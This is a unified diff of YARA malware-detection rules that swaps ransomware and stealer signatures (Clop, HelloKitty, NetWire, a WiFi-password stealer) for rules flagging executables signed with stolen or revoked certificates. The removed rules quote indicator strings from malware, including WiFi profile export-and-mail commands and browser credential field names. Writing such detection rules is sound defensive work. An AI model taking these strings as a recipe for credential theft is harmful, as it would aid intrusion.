-		description = "Detects Vovalex ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "967af585-8a91-5ed0-8400-a8a24d95fd12"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "c9604f76-ad8a-5ac0-ba12-5030b12bedbf"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4705-L4718"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7601-L7613"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ea695521981f4b007eee50e95f7989dda1f07cc411c59450489bb17391ff29dc"
+		logic_hash = "a212e491ce661dec5512f82eed42b1863afb75ce7fb185c41af178f3852b78c8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "README.VOVALEX.txt" fullword ascii
-		$s2 = "\\src\\phobos\\std\\" ascii
-		$s3 = "LoadLibraryA(\"Advapi32.dll\")" fullword ascii
-		$s4 = "Failed to spawn process \"" fullword ascii
-		$s5 = "=== Bypassed ===" fullword ascii
-		$s6 = "If you don't know where to buy" ascii
+		thumbprint = "288959bd1e8dd12f773e9601dc21c57678769909"
+		hash1 = "151b1495d6d1c68e32cdba36d6d3e1d40c8c0d3c12e9e5bd566f1ee742b81b4e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APRIL BROTHERS LTD" and pe.signatures [ i ] . serial == "12:70:5f:b6:6b:c2:2c:68:37:2a:1c:4e:5f:a6:62:e2" )
 }
-rule DITEKSHEN_MALWARE_Win_Dharma : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_205483936F360924E8D2A4Eb6D3A9F31 : FILE
 {
 	meta:
-		description = "Detects Dharma ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "070be95e-8d9c-5c4d-9d46-cddea6dbb682"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "5cce232b-4dfc-5931-a4ea-2e3df5616026"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4720-L4728"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7615-L7627"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2727b2c0295e32699e08c3c79d7ac6fd52f1520358ac23290d40df428c969f4b"
+		logic_hash = "09bf63b88eda95aae094cecb868838f08b88a6b4fe2993145e20293034c12863"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "C:\\crysis\\Release\\PDB\\payload.pdb" fullword ascii
+		thumbprint = "430dbeff2f6df708b03354d5d07e78400cfed8e9"
+		hash1 = "e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SATURN CONSULTANCY LTD" and pe.signatures [ i ] . serial == "20:54:83:93:6f:36:09:24:e8:d2:a4:eb:6d:3a:9f:31" )
 }
-rule DITEKSHEN_MALWARE_Win_Cryptolocker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_06Bcb74291D96096577Bdb1E165Dce85 : FILE
 {
 	meta:
-		description = "Detects Cryptolocker ransomware variants (Betarasite)"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4c6d714d-1fb1-55ce-8022-40f6f634e2cd"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "e7c24edc-2e59-5ee1-ad2f-d260b4014fdd"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4730-L4752"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7629-L7641"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e1700e8ace338c25119305878e8bc52210506bd42183007985ba9601abdab87b"
+		logic_hash = "34f533f7c7e12aaac9a1998654fae6ffde366affa90e9cba061b356fa7190e71"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "CryptoLocker" fullword wide
-		$x2 = ".betarasite" fullword wide
-		$x3 = "CMSTPBypass" fullword ascii
-		$s1 = "CommandToExecute" fullword ascii
-		$s2 = "SetInfFile" fullword ascii
-		$s3 = "SchoolPrject1" ascii
-		$s4 = "$730d5f64-bd57-47c1-9af4-d20aec714d02" fullword ascii
-		$s5 = "Encrypt" fullword ascii
-		$s6 = "Invalide Key! Please Try Again." fullword wide
-		$s7 = "RegAsm" fullword wide
-		$s8 = "Your key will be destroyed" wide
-		$s9 = "encrypted using RC4 and RSA-2048" wide
-		$c1 = "https://coinbase.com" fullword wide
-		$c2 = "https://localbictoins.com" fullword wide
-		$c3 = "https://bitpanda.com" fullword wide
+		thumbprint = "d1bde6303266977f7540221543d3f2625da24ac4"
+		hash1 = "074cef597dc028b08dc2fe927ea60f09cfd5e19f928f2e4071860b9a159b365d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 2 of ( $x* ) and 5 of ( $s* ) ) or ( all of ( $c* ) and 1 of ( $x* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Revo Security SRL" and pe.signatures [ i ] . serial == "06:bc:b7:42:91:d9:60:96:57:7b:db:1e:16:5d:ce:85" )
 }
-rule DITEKSHEN_MALWARE_Win_PWSH_Poshwifistealer
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0D261C8470Adbb65800Ceaf3Eac70819 : FILE
 {
 	meta:
-		description = "Detects PowerShell PoshWiFiStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "69ac123d-b746-57f1-a488-547f9a9cdd86"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "0304b3ae-6a3c-5831-a749-76432b3356b4"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4754-L4765"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7643-L7655"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "769349360b5d22226a5339a9e8471d06731dc522475c9385c1c145a0488e0ad1"
+		logic_hash = "e71f5d24500ac202aad5a439aa0d5f1bf7e6259c1d7e11bb40c7b9ae93bd86c0"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "netsh wlan export profile" ascii
-		$s2 = "Send-MailMessage" ascii
-		$u1 = "https://github.com/axel05869/Wifi-Grab" ascii
-		$u2 = "/exploitechx/wifi-password-extractor" ascii
+		tags = "FILE"
+		thumbprint = "307ef8a02a0fc9032591c624624fa3531c235aa1"
+		hash1 = "050dbd816c222d3c012ba9f2b1308db8e160e7d891f231272f1eacf19d0a0a06"
+		importance = 20
 
 	condition:
-		all of ( $s* ) or all of ( $u* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bandicam Company Corp." and pe.signatures [ i ] . serial == "0d:26:1c:84:70:ad:bb:65:80:0c:ea:f3:ea:c7:08:19" )
 }
-rule DITEKSHEN_MALWARE_Win_Steamhook : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_40E27B7404Aa9B485F8A2Fc0C8E53Af3 : FILE
 {
 	meta:
-		description = "Detects potential Steam stealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7533fb83-d721-54e6-8ae1-1c840dd5a13d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "1aee45e6-ff0b-56a6-a50e-284bf2122e3b"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4767-L4781"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7657-L7668"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da743ca99fd19828e3938875acaf6544f17d884587a59623c8361f5905af4a57"
+		logic_hash = "95a0bcf9b52ba8f4b63453abf0ee28027689450557a2408c6b27f8aafcbbe945"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Mozilla/4.0 (compatible; )" fullword ascii
-		$s2 = "/steam/upload.php" ascii
-		$s3 = ".*?(ssfn\\d+)" fullword ascii
-		$s4 = "add cookie failed..." fullword ascii
-		$s5 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii
-		$pdb1 = "\\SteamHook\\Install\\" ascii
-		$pdb2 = "\\SteamHook\\dll\\" ascii
+		thumbprint = "ca468ff8403a8416042705e79dbc499a5ea9be85"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $pdb* ) or ( 1 of ( $pdb* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Southern Wall Systems, LLC" and pe.signatures [ i ] . serial == "40:e2:7b:74:04:aa:9b:48:5f:8a:2f:c0:c8:e5:3a:f3" )
 }
-rule DITEKSHEN_MALWARE_Win_Netwire : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_627Dfdf73A1455De5143A270799E6B7B : FILE
 {
 	meta:
-		description = "Detects NetWire RAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c215f449-c725-51da-8f5b-2619bc282b22"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "7d5f0279-9498-5713-9c02-a025268d108f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4783-L4805"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7670-L7681"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bae4f0cd7a431336bd784ba95f6ba3396e6f0f12c081e62482ad37ff859c1f1c"
+		logic_hash = "833e772e56e87f730ee1acb9d6ed747d239903cfd9470d777efab73c5d656f49"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "SOFTWARE\\NetWire" fullword ascii
-		$x2 = { 4e 65 74 57 69 72 65 00 53 4f 46 54 57 41 52 45 5c 00 }
-		$s1 = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword ascii
-		$s2 = "filenames.txt" fullword ascii
-		$s3 = "GET %s HTTP/1.1" fullword ascii
-		$s4 = "[%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
-		$s5 = "Host.exe" fullword ascii
-		$s6 = "-m \"%s\"" fullword ascii
-		$g1 = "HostId" fullword ascii
-		$g2 = "History" fullword ascii
-		$g3 = "encrypted_key" fullword ascii
-		$g4 = "Install Date" fullword ascii
-		$g5 = "hostname" fullword ascii
-		$g6 = "encryptedUsername" fullword ascii
-		$g7 = "encryptedPassword" fullword ascii
+		thumbprint = "7b69ff55d3c39bd7d67a10f341c1443425f0c83f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( all of ( $g* ) and ( 2 of ( $s* ) or 1 of ( $x* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai liancheng Technology Co., Ltd." and pe.signatures [ i ] . serial == "62:7d:fd:f7:3a:14:55:de:51:43:a2:70:79:9e:6b:7b" )
 }
-rule DITEKSHEN_MALWARE_Win_Breakstaf : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1966Bc76Bda1A708334792Da9A336F69 : FILE
 {
 	meta:
-		description = "Detects BreakStaf ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3c8ca485-2cb4-56fd-a1f5-16b43515cec9"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "254ccdb7-df1c-560a-af68-123ea66c3463"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4807-L4827"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7683-L7694"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "56078b797c64ce77398f9b92e5677f7159d8357eafb03cf62bb30f06d4f3b2e3"
+		logic_hash = "d0293e76f8a595d769fd302829bd94a576d647bbacb586728e804bf4dce1af78"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "C:\\Program files" wide
-		$s2 = "C:\\Program files (x86)" wide
-		$s3 = "C:\\System Volume Information" wide
-		$s4 = "C:\\$Recycle.Bin" wide
-		$s5 = "C:\\Windows" wide
-		$s6 = ".?AVRandomNumberGenerator@Crypto" ascii
-		$s7 = ".?AV?$SymmetricCipherFinal@" ascii
-		$s8 = ".breakstaf" fullword wide nocase
-		$s9 = "readme.txt" fullword wide nocase
-		$s10 = ".VHD" fullword wide nocase
-		$s11 = ".vhdx" fullword wide nocase
-		$s12 = ".BAK" fullword wide nocase
-		$s13 = ".BAC" fullword wide nocase
+		thumbprint = "29fec27c36efc6809c7269f76cf86ee18cc6ed87"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 12 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SYNTHETIC LABS LIMITED" and pe.signatures [ i ] . serial == "19:66:bc:76:bd:a1:a7:08:33:47:92:da:9a:33:6f:69" )
 }
-rule DITEKSHEN_MALWARE_Win_Kitty : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_82D224323Efa65060B641F51Fadfef02 : FILE
 {
 	meta:
-		description = "Detects HelloKitty ransomware, triggers on FIVEHANDS"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4147294a-7eff-595a-ad4f-8a84ffff960f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "2c0b0e6d-2c82-506b-88ea-a6d49f0f64a6"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4829-L4847"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7696-L7710"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3a36755c81ec70c127bb73448fc29325444b85b5f0704327fc81975c2af2e99e"
+		logic_hash = "3ed849dfd905e01145274d41b3bbb2c0265b099e540ac17909b6ed59f006e245"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Kitty" wide
-		$s2 = "-path" fullword wide
-		$s3 = "select * from Win32_ShadowCopy" fullword wide
-		$s4 = "Win32_ShadowCopy.ID='%s'" fullword wide
-		$s5 = "programdata" fullword wide
-		$s6 = "$recycle.bin" fullword wide
-		$s7 = ".crypt" fullword wide
-		$s8 = "%s/secret/%S" wide
-		$s9 = "decrypts3nln3tic.onion" wide
-		$n1 = "read_me_lkd.txt" wide
-		$n2 = "DECRYPT_NOTE.txt" wide
+		thumbprint = "8dccf6ad21a58226521e36d7e5dbad133331c181"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 1 of ( $n* ) and 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAVAS INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" or pe.signatures [ i ] . serial == "00:82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent07 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Be2F22C152Bb218B898C4029056816A9 : FILE
 {
 	meta:
-		description = "Detects delf downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a45afe84-15ae-528a-ad7e-ab9f03045789"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "50c0cee3-39d5-5c57-9515-11356f8cab93"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4849-L4867"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7712-L7726"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1e0001d18524d0d34ad876e67e2c4dc0495ee18a73c34f53f97367876e27b406"
+		logic_hash = "9eba1585d92b184afb7b75b84e0010539ac42ca27e4d5d8bccee6b01e3471cca"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "C:\\Users\\Public\\Libraries\\temp" fullword ascii
-		$s2 = "SOFTWARE\\Borland\\Delphi" ascii
-		$s3 = "Mozilla/5.0(compatible; WinInet)" fullword ascii
-		$o1 = { f3 a5 e9 6b ff ff ff 5a 5d 5f 5e 5b c3 a3 00 40 }
-		$o2 = { e8 83 d5 ff ff 8b 15 34 40 41 00 89 10 89 58 04 }
-		$o3 = { c3 8b c0 53 51 e8 f1 ff ff ff 8b d8 85 db 74 3e }
-		$o4 = { e8 5c e2 ff ff 8b c3 e8 b9 ff ff ff 89 04 24 83 }
-		$o5 = { 85 c0 74 1f e8 62 ff ff ff a3 98 40 41 00 e8 98 }
-		$o6 = { 85 c0 74 19 e8 be ff ff ff 83 3d 98 40 41 00 ff }
-		$x1 = "22:40:08        \"> <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"> <rdf:Description rdf:about=\"\"" ascii
-		$x2 = "uuid:A9BD8E384B2FDE118D26E6EE744C235C\" stRef:documentID=\"uuid:A8BD8E384B2FDE118D26E6EE744C235C\"/>" ascii
+		thumbprint = "85fe11e799609306516d82e026d4baef4c1e9ad3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $s* ) and 5 of ( $o* ) ) or ( all of ( $s* ) and 2 of ( $o* ) ) or ( all of ( $x* ) and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marts GmbH" and ( pe.signatures [ i ] . serial == "be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" or pe.signatures [ i ] . serial == "00:be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Clop : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_29E8E993D2406454B6B18Cb377471Bc6 : FILE
 {
 	meta:
-		description = "Detects Clop ransomware variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d3c9e950-8b03-5d19-8448-9cf208813df2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "a80f015c-3793-52ac-a405-1a7fe2ca0caa"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4869-L4889"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7728-L7739"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a1a21100c468c4db147f97b0724b7a3aefbb92b157071bfe6f61d02768573b44"
+		logic_hash = "bf248e664d00675d3fc87070b6358ca7539ef6e748b8bfafcba7ecb91cb1ea05"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Cllp^_-" ascii
-		$s2 = "temp.dat" fullword wide
-		$s3 = "README_README.txt" wide
-		$s4 = "BEGIN PUBLIC KEY" ascii
-		$s5 = "runrun" wide
-		$s6 = "wevtutil.exe" ascii
-		$s7 = "%s%s.Cllp" fullword wide
-		$s8 = "WinCheckDRVs" fullword wide
-		$o1 = { 6a ff 56 89 9d 28 dd ff ff ff d0 a1 64 32 41 00 }
-		$o2 = { 56 89 9d 28 dd ff ff ff 15 78 32 41 00 eb 07 43 }
-		$o3 = { 68 ?? 34 41 00 8d 85 58 dd ff ff 50 ff d7 85 c0 }
-		$o4 = { 68 d0 34 41 00 50 ff d6 8b bd 28 d5 ff ff 83 c4 }
-		$o5 = { a1 64 32 41 00 43 56 89 9d 08 d5 ff ff ff d0 8b }
+		thumbprint = "0fb38235366b0ba534a6f81c02d9a67555235e07"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $x* ) and ( 3 of ( $s* ) or 4 of ( $o* ) ) ) or ( all of ( $o* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 4 of ( $o* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MONDIAL MONTERO SP Z O O" and pe.signatures [ i ] . serial == "29:e8:e9:93:d2:40:64:54:b6:b1:8c:b3:77:47:1b:c6" )
 }
-rule DITEKSHEN_MALWARE_Win_Maktub : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6Daa67498C3A5D8133F28Fefe9Ccc20E : FILE
 {
 	meta:
-		description = "Detects Maktub ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "be47d858-8497-593f-865b-c3d3a5db6c2e"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4891-L4905"
+		id = "5eb899b3-347d-5e74-8afa-29ffa73c7231"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7741-L7754"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c11d04fc3088eb8a0132b9ed83748ddb7e1bbe9d03b9e884d4003181cbb6d69"
+		logic_hash = "dc66a18e4f8d14f98e5a8073d32b641e0eb795e989fb62ac23207e765838561a"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Content-Disposition: attachment; filename=" ascii
-		$s2 = "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" fullword ascii
-		$s3 = "/tor/status-vote/current/consensus" ascii
-		$s4 = "/tor/server/fp/" ascii
-		$s5 = "/tor/rendezvous2/" ascii
-		$s6 = "404 Not found" fullword ascii
-		$s7 = /_request@\d+/ fullword ascii
+		thumbprint = "f54146fadad277f67b14cfebd13cbada9789281cee7165db0277ad51621adb97"
+		reason = "ParallaxRAT"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rimsara Development OU" and pe.signatures [ i ] . serial == "6d:aa:67:49:8c:3a:5d:81:33:f2:8f:ef:e9:cc:c2:0e" )
 }
-rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe01
+
+rule DITEKSHEN_INDICATOR_KB_CERT_59F296D0Af649E0962D724248D9Fdcdb : FILE
 {
 	meta:
-		description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fd44f48c-7a24-512b-8375-c9f978a8b5bd"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4907-L4920"
+		id = "c9423cae-07a7-5ecb-966d-b1636563934a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7756-L7769"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7dd377f6a1cc48ef8ab9d53989755fb967c89d3798b721781bc09043ba3d86f4"
+		logic_hash = "0212033b2ea12f568a3c2e4d3768194c8035c6b6ebf054af90fe82ffcd7e6a5b"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$rp1 = "GetType('RunPe.RunPe'" ascii
-		$rp2 = "GetType(\"RunPe.RunPe\"" ascii
-		$rm1 = "GetMethod('Run'" ascii
-		$rm2 = "GetMethod(\"Run\"" ascii
-		$s1 = ".Invoke(" ascii
-		$s2 = "[Reflection.Assembly]::Load(" ascii
+		tags = "FILE"
+		thumbprint = "ce2aa31a714cc05f86d726a959f6655efc40777aa474fb6b9689154fdc918a44"
+		reason = "DarkGate"
+		importance = 20
 
 	condition:
-		all of ( $s* ) and 1 of ( $rp* ) and 1 of ( $rm* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MK ZN s.r.o." and pe.signatures [ i ] . serial == "59:f2:96:d0:af:64:9e:09:62:d7:24:24:8d:9f:dc:db" )
 }
-rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe02
+
+rule DITEKSHEN_INDICATOR_KB_CERT_A32F3Ba229704Ad400473F7479E4C3E4 : FILE
 {
 	meta:
-		description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "08261054-bebc-58fe-949a-27f6e817003a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4922-L4934"
+		id = "28d687bc-e67c-51d1-82af-53255ee44a8d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7771-L7784"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
